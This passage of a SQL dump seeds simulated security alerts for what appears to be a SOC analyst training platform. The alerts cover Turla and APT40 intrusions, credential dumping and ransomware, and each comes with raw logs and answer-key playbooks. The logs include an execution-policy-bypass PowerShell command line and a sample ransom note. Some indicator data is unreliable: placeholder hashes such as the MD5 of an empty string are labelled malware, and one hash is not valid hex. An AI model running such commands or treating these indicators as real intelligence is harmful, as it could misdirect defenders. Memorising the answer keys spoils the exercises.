using RDP with hijacked credentials\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Scan\",\"verdict\":\"internal\",\"details\":\"Internal corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Turla tool\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"turla_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with Turla APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (351, 'Exfiltration Through Satellite Link Hijacking', 'high', 'Satellite Communication Logs', 'In a final maneuver, Turla uses hijacked satellite internet links to stealthily exfiltrate sensitive data, masking the C2 traffic and evading traditional network defenses.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:16Z\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"sensitive_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"data_exfiltration\",\"protocol\":\"satellite_link\",\"malware\":\"Turla\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Turla group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Contains potentially sensitive information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (352, 'Suspicious Access to University Network', 'high', 'Firewall logs', 'APT40 exploited a known vulnerability in the university\'s web server software, gaining initial access to the network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:22:10Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"dst_port\":443,\"method\":\"GET\",\"url\":\"/vulnerable_endpoint\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\"http_version\":\"HTTP/1.1\",\"status_code\":200,\"response_size\":5120,\"referer\":\"http://malicious.example.com\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"exploit_payload.bin\",\"action\":\"allowed\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"University web server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"APT40 exploit payload used in multiple attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Investigation\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file name discovered during analysis.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (353, 'Execution of Custom Malware', 'high', 'Endpoint detection systems', 'APT40 executed a custom malware payload shortly after gaining access to the network. The malware is designed to operate stealthily, conducting reconnaissance and data collection.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"EVT12345\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"john_doe\",\"process_name\":\"custom_malware.exe\",\"process_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"command_line\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"detection_method\":\"behavioral analysis\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"network_activity\":[{\"ip_address\":\"203.0.113.45\",\"port\":443,\"protocol\":\"HTTPS\"}]}}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as APT40 custom malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"custom_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Custom malware filename used by APT40.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (354, 'Establishing Persistence via Web Shell', 'high', 'Web server logs', 'APT40 installed a web shell on the compromised server to ensure persistent access, even if initial access vectors are closed. The web shell was identified through unusual POST requests and the presence of a suspicious file on the server.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"request_method\":\"POST\",\"uri\":\"/uploads/shell.jsp\",\"http_version\":\"HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"status_code\":200,\"response_size\":3452,\"referrer\":\"http://example.com/login\",\"file_hash\":\"1a79a4d60de6718e8e5b326e338ae533\",\"username\":\"admin\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"The IP address is associated with known APT40 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This file is recognized as a common web shell used by attackers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"1a79a4d60de6718e8e5b326e338ae533\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Bazaar\",\"verdict\":\"suspicious\",\"details\":\"The hash matches files used in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (355, 'Lateral Movement to Secure Data Sources', 'high', 'Network traffic analysis', 'The attackers used legitimate credentials obtained during the initial breach to navigate through the network, reaching sensitive research databases containing proprietary sonar technology schematics.', 'Lateral Movement', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login using compromised credentials\",\"file_accessed\":\"/network_share/sonar_schematics_v2.pdf\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Access granted to sensitive data after lateral move\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Research database server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in unauthorized access\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"No known issues with file hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (356, 'Exfiltration of Sonar Technology Schematics', 'high', 'Data loss prevention (DLP) systems', 'APT40 utilized encrypted channels to transfer the stolen sonar technology schematics to external servers, completing their data theft operation. The data exfiltration was detected by DLP systems monitoring outgoing traffic. The transfer was executed using the file \'sonar_tech_designs.zip\' over an encrypted connection to a known malicious IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:53:12Z\",\"source_ip\":\"10.0.10.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"sonar_tech_designs.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"transfer_size\":10485760,\"alert_trigger\":\"DLP Policy: Sensitive Data Exfiltration\",\"encryption\":\"TLSv1.2\"}', '2026-01-03 00:42:39', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT40 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"sonar_tech_designs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive sonar schematics.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in previous exfiltration attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"User account associated with current employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (357, 'Suspicious Web Traffic Detected', 'high', 'Web Proxy Logs', 'A suspicious drive-by download was detected from a compromised ad network, which delivered an initial payload to an internal workstation, potentially leading to unauthorized access.', 'Drive-by Download', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:01Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"url\":\"http://malicious-ad-network.com/ads\",\"method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://trusted-news-portal.com\",\"filename\":\"exploit_kit.js\",\"hash\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"username\":\"jdoe\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-ad-network.com/ads\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known exploit kit\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_kit.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Identified as part of an exploit kit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (358, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A PowerShell script is executed on the infected system, establishing a foothold within the network and allowing further payloads to be delivered.', 'PowerShell Script', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"event_type\":\"process_creation\",\"computer_name\":\"WIN-0A1B2C3D4E5F\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious_payload.ps1\",\"file_hash\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"related_domain\":\"malicious-apt.com\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious script used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious PowerShell scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User with administrative privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (359, 'Persistence Mechanism Established', 'high', 'Windows Event Logs', 'The malware modifies registry keys to ensure it runs on system startup, maintaining persistence even after reboots. The registry modification indicates a sophisticated attempt to establish persistence on the system.', 'Registry Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"EventID\":4657,\"TimeCreated\":\"2023-10-25T14:35:22Z\",\"Computer\":\"victim-pc.localdomain\",\"UserID\":\"S-1-5-21-3456789012-3456789012-3456789012-1001\",\"UserName\":\"john.doe\",\"ProcessID\":4567,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"RegistryKey\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"RegistryValue\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\maliciousApp.exe -silent\",\"Hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"SourceIP\":\"192.168.1.105\",\"AttackerIP\":\"203.0.113.45\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"IP address known for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account on the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (360, 'Credential Dumping Detected', 'high', 'SIEM Alerts', 'The attackers used Mimikatz to extract credentials from memory, enabling lateral movement across the network to escalate privileges.', 'Mimikatz', 'Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:33Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"user\":\"DOMAIN\\\\admin_user\",\"filename\":\"mimikatz.exe\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"process_id\":3216,\"event_type\":\"Credential Dumping\",\"message\":\"Suspicious process mimikatz.exe detected extracting credentials from memory.\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_provider\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Mimikatz executable used for credential extraction.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"DOMAIN\\\\admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"internal\",\"details\":\"Privileged domain account used in the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (361, 'Suspicious File Transfer', 'high', 'Network Traffic Analysis', 'Using SMB, the attackers transfer ransomware payloads to other critical systems within the network. This activity is indicative of lateral movement, preparing for a widespread encryption event.', 'SMB Traffic', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"192.168.1.105\",\"external_attacker_ip\":\"203.0.113.25\",\"protocol\":\"SMB\",\"file_transferred\":\"ransomware_payload.exe\",\"file_hash\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"username\":\"compromised_user\",\"action\":\"file_transfer\",\"smb_command\":\"SMB2_WRITE\",\"destination_port\":\"445\"}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e2c7d5f234f5c8a9b3a6261d4b7e2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Filename used in the ransomware attack campaign.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Account observed in unauthorized file transfer activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (362, 'Data Encryption in Progress', 'critical', 'File Integrity Monitoring', 'The ransomware begins encrypting files on key servers, prompting the attackers to initiate contact with a ransom demand.', 'Ransomware Encryption', 'T1486', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"event_id\":\"FIM-20231005-001\",\"event_type\":\"file_modification\",\"description\":\"Suspicious file encryption activity detected on server.\",\"affected_host\":\"192.168.1.10\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"admin_user\",\"filename_encrypted\":\"confidential_data.xlsx\",\"ransomware_name\":\"CryptoLockerSim\",\"process_name\":\"encryptor.exe\",\"process_id\":4567}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to CryptoLockerSim ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_system\",\"verdict\":\"suspicious\",\"details\":\"File targeted by ransomware encryption.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (363, 'Ransom Note and Communication', 'critical', 'Incident Response Team', 'A ransom note has appeared on encrypted systems, instructing the company to contact the attackers for decryption keys. The note includes specific communication channels and requests for payment in cryptocurrency. The Incident Response Team is working to find a flaw in the encryption while simulating negotiations with the attackers.', 'Ransomware Note', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:45:00Z\",\"event\":\"Ransomware Note Detected\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.5\",\"ransom_note_filename\":\"READ_ME.txt\",\"ransom_note_content\":\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\",\"attacker_email\":\"attacker@example.com\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"j.doe\",\"severity\":\"Critical\",\"encryption_algorithm\":\"AES-256\",\"affected_systems\":[\"10.0.0.5\",\"10.0.0.10\"]}', '2026-01-03 00:50:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised 